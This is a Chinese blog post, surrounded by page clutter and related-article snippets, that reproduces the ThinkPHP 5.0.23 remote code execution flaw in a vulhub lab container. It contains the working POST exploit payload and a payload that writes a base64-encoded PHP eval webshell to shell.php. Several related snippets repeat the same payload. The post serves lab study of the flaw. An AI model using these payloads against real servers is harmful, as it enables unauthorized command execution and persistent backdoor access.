vulhub ThinkPHP5 5.0.23远程代码执行漏洞

最新推荐文章于 2024-07-26 17:57:56 发布

²⁰⁰²₀₂.₀₁T̶B̶

最新推荐文章于 2024-07-26 17:57:56 发布

阅读量119

点赞数 2

分类专栏： vulhub靶场网络安全文章标签： php Powered by 金山文档

本文链接：https://blog.csdn.net/qq_53409748/article/details/129652318

版权

网络安全同时被 2 个专栏收录

13 篇文章 1 订阅

订阅专栏

vulhub靶场

5 篇文章 0 订阅

订阅专栏

靶场环境

进入到/vulhub-master/thinkphp/5.0.23-rce 路径下 docker-compose up -d启动

漏洞复现

环境启动后，访问192.168.121.131:8080

第一步：判断是否存在漏洞：

访问/index.php?s=captcha页面，会出现如下报错：

使用HackBar 插件发送 POST 请求：(使用burpsuit也可)

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=whoami

通过echo命令写入 Webshell 文件

首先将一句话木马进行Base64 编码：

发送POST 请求：

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo -n YWE8P3BocCBAZXZhbCgkX1JFUVVFU1RbJ2F0dGFjayddKSA/PmJi | base64 -d > shell.php

成功访问，说明shell上传成功

使用工具进行连接

成功连接

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

²⁰⁰²₀₂.₀₁T̶B̶

关注关注

2
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
vulhub ThinkPHP5 5.0.23远程代码执行漏洞

ThinkPHP5 5.0.23远程代码执行漏洞
复制链接

扫一扫

专栏目录

ThinkPHP5 5.0.23 远程代码执行漏洞

weixin_51387754的博客

01-01

859

ThinkPHP5 5.0.23 远程代码执行漏洞 ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中，获取method的方法中没有正确处理方法名，导致攻击者可以调用Request类任意方法并构造利用链，从而导致远程代码执行漏洞。漏洞复现执行如下命令启动一个默认的thinkphp 5.0.23环境： docker-compose up -d 环境启动后，访问http://your-ip:8080即可看到默认的ThinkPHP启动页面。 POST /index.php?s=ca

ThinkPHP5 5.0.22/5.1.29 远程代码执行漏洞

zeroc009的博客

02-15

641

漏洞简述 ThinkPHP是一款运用极广的PHP开发框架。其版本5中，由于没有正确处理控制器名，导致在网站没有开启强制路由的情况下（即默认情况下）可以执行任意方法，从而导致远程命令执行漏洞。影响范围受影响的版本 ThinkPHP 5.0.x < 5.0.23 ThinkPHP 5.1.x < 5.1.31 不受影响的版本 ThinkPHP 5.0.23 ThinkPHP 5.1.31 复现过程 phpinfo、命令执行 http://192.168.1.7:8080/index.php?s=

参与评论您还未登录，请先登录后发表或查看评论

Thinkphp5.0.23-rce漏洞复现

qq_64875725的博客

06-02

2443

ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中，获取method的方法中没有正确处理方法名，导致攻击者可以调用Request类任意方法并构造利用链，从而导致远程代码执行漏洞。: 'GET';} elseif (!} else {

ThinkPHP5 5.0.23远程代码执行漏洞+webshell工具连接（复现详细过程）

m0_52701599的博客

03-17

3135

ThinkPHP5 5.0.23远程代码执行漏洞+webshell工具连接（复现详细过程）

Thinkphp5.0.23 rce（远程代码执行）的漏洞复现

热门推荐

陈瘦瘦的迪迦的博客

12-08

1万+

Thinkphp5.0.23 rce（远程代码执行）的漏洞复现漏洞形成原因框架介绍： ThinkPHP是一款运用极广的PHP开发框架。漏洞引入：其5.0.23以前的版本中，获取method的方法中没有正确处理方法名，导致攻击者可以调用Request类任意方法并构造利用链，从而导致远程代码执行漏洞。漏洞如何利用 1、访问靶机地址+端口号进入首页 2、Burp抓包修改传参方式为Post，传入参数为"_method=__construct&filter[]=system&meth

Thinkphp框架漏洞---＞5.0.23 RCE

huohaowen的博客

03-01

1500

本篇文章来讲一下thinkphp的框架漏洞

ThinkPHP5.0.23 远程代码执行漏洞

夜星空如海的博客

09-30

1834

ThinkPHP 是一款运用极广的 PHP 开发框架。其 5.0.23 以前的版本中，获取 method 的方法中没有正确处理方法名，导致攻击者可以调用 Request 类任意方法并构造利用链，从而导致远程代码执行漏洞。

ThinkPHP 5.0 远程代码执行漏洞分析

02-21

### ThinkPHP 5.0 远程代码执行漏洞分析 #### 漏洞背景与概述 ThinkPHP是一款广泛使用的PHP框架，它提供了丰富的功能和良好的性能。然而，如同任何复杂的软件系统一样，它也存在安全漏洞。本次分析的焦点集中在...

thinkphp5远程执行代码漏洞修复补丁.zip

04-17

标题中的“thinkphp5远程执行代码漏洞修复补丁”指的是ThinkPHP5框架存在一个严重的安全问题，即远程代码执行漏洞（通常称为RCE）。在ThinkPHP5中，这个漏洞允许攻击者通过精心构造的HTTP请求，执行任意系统命令，...

ThinkPHP v5.0.23 核心版

10-05

《ThinkPHP v5.0.23核心版详解》 ThinkPHP，作为一款深受开发者喜爱的PHP框架，自诞生以来，以其简洁、高效的特性在PHP社区中占据了一席之地。尤其是ThinkPHP v5.0系列，它在继承了ThinkPHP框架一贯的优势之外，...

ThinkPHP 5.0.0_5.0.23 RCE 漏洞分析1

08-03

然而，在 ThinkPHP 5.0.0 到 5.0.23 版本中存在一个 Remote Code Execution（RCE）漏洞，该漏洞允许攻击者在服务器上执行任意代码。该漏洞是由于 ThinkPHP 的路由机制存在缺陷，攻击者可以通过构造特殊的 URL 来...

ThinkPHP5 5.0.23远程代码执行漏洞复现

weixin_51641247的博客

03-16

503

漏洞介绍ThinkPHP5.0.23版本的漏洞：获取method的方法中没有正确处理方法名，导致攻击者可以调用Request类任意方法并构造利用链，从而导致远程代码执行漏洞。

复现ThinkPHP5 5.0.23远程代码执行漏洞，并挂马

weixin_53872203的博客

02-25

1231

本文章仅供学习参考使用（1）打开靶场（2）使用工具searchsploit ,对Thinkphp进行漏洞扫描，发现remote Code Execution(远程代码执行漏洞) (3) 将改漏洞cp到tp.txt文件并查看（4）查看thinkphp5 5.0.23的版本中发现了playload ...

Thinkphp5.0.0~5.0.23 RCE漏洞复现分析

cosmoslin的博客

11-19

6166

漏洞概要漏洞存在于 ThinkPHP 底层没有对控制器名进行很好的合法性校验，导致在未开启强制路由的情况下，用户可以调用任意类的任意方法，最终导致远程代码执行漏洞的产生。环境搭建： Phpstudy： OS: Windows PHP: 7.3.4 ThinkPHP: 5.0.22 POC http://xxxxxx.xxx/public/?s=captcha Body _method=__construct&filter[]=system&method=get&get.

p36273的博客

09-16

1470

简言之，别人帮你建好了房子但尚未装修，你需要在别人设计好的户型里去装修，省去你搬砖的重复性操作。------ ThinkPHP发展至今，核心版本主要有以下几个系列，ThinkPHP 2系列、ThinkPHP 3系列、ThinkPHP 5系列、ThinkPHP 6系列，各个系列之间在代码实现及功能方面，有较大区别。其中ThinkPHP 2以及ThinkPHP 3系列已经停止维护，ThinkPHP 5系列现使用最多，而ThinkPHP 3系列也积累了较多的历史用户。

热门框架漏洞（Thinkphp）

2302_79885863的博客

04-25

1758

（__construct是一个魔术方法里面的一个析构函数，只要我在对象里面new了一个对象之后，会自动调用__construct里面的代码，我们不需要进行调用，我们只要创建一个对象会自动调用，这个参数会对我们网站里面的代码进行覆盖他就会那个本来要执行的代码进行覆盖。这里达到的效果是phpinfo（1），我们正常写的情况下里面没有值这里给了一个1的值，是因为我们这里查找的php文件不完整数字不同，获取的文件里面的信息也是不同。的情况下，用户可以调用任意类的任意方法，最终导致远程代码执行漏洞的产生。

PHP商城案例